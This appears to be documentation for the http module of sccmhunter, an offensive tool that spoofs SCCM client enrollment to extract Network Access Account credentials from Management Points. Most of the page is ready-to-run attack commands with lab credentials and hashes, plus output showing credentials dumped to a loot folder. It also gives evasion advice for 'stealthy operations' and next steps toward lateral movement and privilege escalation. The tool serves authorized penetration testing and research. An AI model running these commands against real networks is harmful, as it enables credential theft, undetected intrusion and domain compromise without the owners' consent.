Skip to main content
The http module exploits SCCM’s client enrollment process to extract Network Access Account credentials from Management Points. This technique combines Adam Chester’s research with skelsec’s deobfuscator to spoof legitimate client enrollment and retrieve sensitive policy information.
This attack leverages the fact that SCCM clients automatically receive Network Access Account credentials through policy requests, allowing attackers to extract these credentials by masquerading as legitimate clients.

Attack Overview

The HTTP client enrollment attack works by:
  1. Machine Account Creation: Creating a new machine account in Active Directory (or using existing credentials)
  2. Client Registration: Registering with Management Points as a legitimate SCCM client
  3. Policy Request: Requesting client policies that contain Network Access Account credentials
  4. Credential Extraction: Decrypting and extracting the credentials from the policy response
This attack requires machine account privileges. The -auto flag will automatically create a machine account if you have sufficient privileges, or you can provide existing machine account credentials.

Troubleshooting Common Issues

Cause: This error typically occurs when the policy is not immediately available after registration.Solutions:
  • Increase sleep time with the -sleep flag (default: 10 seconds)
  • Use manual policy request with -mp and -uuid flags
  • Wait for SCCM database updates to complete
  • Check for proxy interference in network communications
Root Causes:
  • SCCM database performance issues
  • Network proxy delays
  • Management Point processing lag
  • Timing synchronization issues

Prerequisites

Requirements

  • Valid Active Directory credentials
  • Ability to create machine accounts OR existing machine account credentials
  • Network access to discovered Management Points
  • Previous enumeration data from find and smb modules

Command Syntax

python3 sccmhunter.py http [OPTIONS]

Parameters

ParameterDescriptionExample
-uUsername for authenticationadministrator
-pPassword for authenticationP@ssw0rd
-dTarget domain nameinternal.lab
-dc-ipDomain controller IP or FQDN10.10.100.100
-hashesNT:LM hash for authenticationaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76
-kUse Kerberos authentication
-no-passDon’t prompt for password
-aesAES key for Kerberos (128/256 bits)
-ldapsUse LDAPS instead of LDAP
ParameterDescriptionExample
-autoAutomatically create machine account and extract policies
-cnExisting machine account nameDESKTOP-ABC123$
-cpMachine account passwordRandomPassword123
ParameterDescriptionExample
-uuidRegistration UUID for manual policy request7E7CC94B-E056-45C8-A2D9-03AD3114AE1F
-mpSpecific Management Point to targetmp.internal.lab
-sleepWait time between registration and policy request (seconds)20
-debugEnable verbose logging
Use the -auto flag for fully automated attacks when you have sufficient privileges to create machine accounts. For stealth or when using existing credentials, use the manual approach with -cn and -cp.

Usage Examples

Fully automated attack using account with machine creation privileges
python3 sccmhunter.py http -u administrator -p P@ssw0rd -d internal.lab -dc-ip 10.10.100.100 -auto
Expected Output:
[19:25:31] INFO     [*] Searching for Management Points from database.
[19:25:32] INFO     [+] Found http://mp.internal.lab/ccm_system_windowsauth
[19:25:32] INFO     [+] Found http://sccm.internal.lab/ccm_system_windowsauth
[19:25:32] INFO     [+] Found http://sccm2.internal.lab/ccm_system_windowsauth
[19:25:33] INFO     [+] Found http://active.internal.lab/ccm_system_windowsauth
[19:25:33] INFO     [*] User selected auto. Attempting to add a machine account then request policies.
[19:25:36] INFO     [+] DESKTOP-KS233C4P$ created with password: K2bNRZJxE0lf
[19:25:36] INFO     [*] Attempting to grab policy from mp.internal.lab
[19:25:37] INFO     [*] Done.. our ID is 7FB2729E-0E61-4CB7-A74A-5AD3170F1A35
[19:25:37] INFO     [*] Waiting 10 seconds for database to update.
[19:25:48] INFO     [+] Got NAA credential: lab\administrator:P@ssw0rd
[19:25:48] INFO     [+] Got NAA credential: lab\administrator:P@ssw0rd
[19:25:48] INFO     [+] Done.. decrypted policy dumped to /root/.sccmhunter/logs/loot/mp_naapolicy.xml
The automatic mode creates a new machine account, registers with all discovered Management Points, and extracts Network Access Account credentials. The decrypted policy is saved for further analysis.
Use pre-existing machine account credentials for stealthy operations
python3 sccmhunter.py http -u administrator -p P@ssw0rd -d internal.lab -dc-ip 10.10.100.100 -cn wikidemo$ -cp P@ssw0rd
Expected Output:
[21:14:28] INFO     [*] Searching for Management Points from database.
[21:14:29] INFO     [+] Found http://mp.internal.lab/ccm_system_windowsauth
[21:14:30] INFO     [+] Found http://sccm.internal.lab/ccm_system_windowsauth
[21:14:31] INFO     [+] Found http://sccm2.internal.lab/ccm_system_windowsauth
[21:14:32] INFO     [+] Found http://active.internal.lab/ccm_system_windowsauth
[21:14:32] INFO     [*] Attempting to grab policy from mp.internal.lab
[21:14:34] INFO     [*] Done.. our ID is 7E7CC94B-E056-45C8-A2D9-03AD3114AE1F
[21:14:34] INFO     [*] Waiting 10 seconds for database to update.
[21:14:45] INFO     [+] Got NAA credential: lab\administrator:P@ssw0rd
[21:14:45] INFO     [+] Got NAA credential: lab\administrator:P@ssw0rd
[21:14:45] INFO     [+] Done.. decrypted policy dumped to /root/.sccmhunter/logs/loot/mp_naapolicy.xml
Using existing machine credentials avoids creating new accounts and may be less detectable. Record the UUID for potential future policy requests.
Request policies using previously obtained registration UUID
python3 sccmhunter.py http -u administrator -p P@ssw0rd -d internal.lab -dc-ip 10.10.100.100 -mp mp.internal.lab -uuid 7E7CC94B-E056-45C8-A2D9-03AD3114AE1F
Expected Output:
[21:16:19] INFO     Submitting manual policy request from previous registration 7E7CC94B-E056-45C8-A2D9-03AD3114AE1F
[21:16:20] INFO     [+] Got NAA credential: lab\administrator:P@ssw0rd
[21:16:20] INFO     [+] Got NAA credential: lab\administrator:P@ssw0rd
[21:16:20] INFO     [+] Done.. decrypted policy dumped to /root/.sccmhunter/logs/loot/mp_naapolicy.xml
Manual policy requests are useful when timing issues occur during initial registration. This allows you to retry policy extraction without re-registering the client.

Attack Analysis

Understanding Network Access Account Credentials

The extracted Network Access Account (NAA) credentials provide:
  • Domain Authentication: Access to network resources during OS deployment
  • Share Access: Read access to distribution point content shares
  • Lateral Movement: Potential for further domain compromise
  • Task Sequence Variables: Additional secrets from deployment configurations

Operational Security

Detection Considerations:
  • Machine account creation may trigger security alerts
  • HTTP traffic to Management Points may be logged
  • Policy requests create entries in SCCM logs
  • Consider using existing machine accounts when possible

Output Files

Generated Artifacts:
  • Decrypted policy XML files
  • Registration UUIDs for future use
  • Network Access Account credentials
  • Task sequence variable dumps

Troubleshooting Guide

‘NoneType’ object has no attribute split
  • Increase -sleep value to 20-30 seconds
  • Try manual policy request with saved UUID
  • Check Management Point availability
Authentication failures
  • Verify machine account creation permissions
  • Confirm machine account credentials are correct
  • Check Kerberos vs NTLM authentication requirements
No Management Points found
  • Run find module first to discover MPs
  • Verify Management Points are accessible
  • Check network connectivity to HTTP endpoints

Next Steps

Credential Usage

Use extracted NAA credentials for:
  • SMB share enumeration
  • Distribution Point access
  • Further lateral movement

MSSQL Exploitation

Leverage credentials for database attacks and privilege escalation

DPAPI Extraction

Extract additional secrets from client systems using local admin access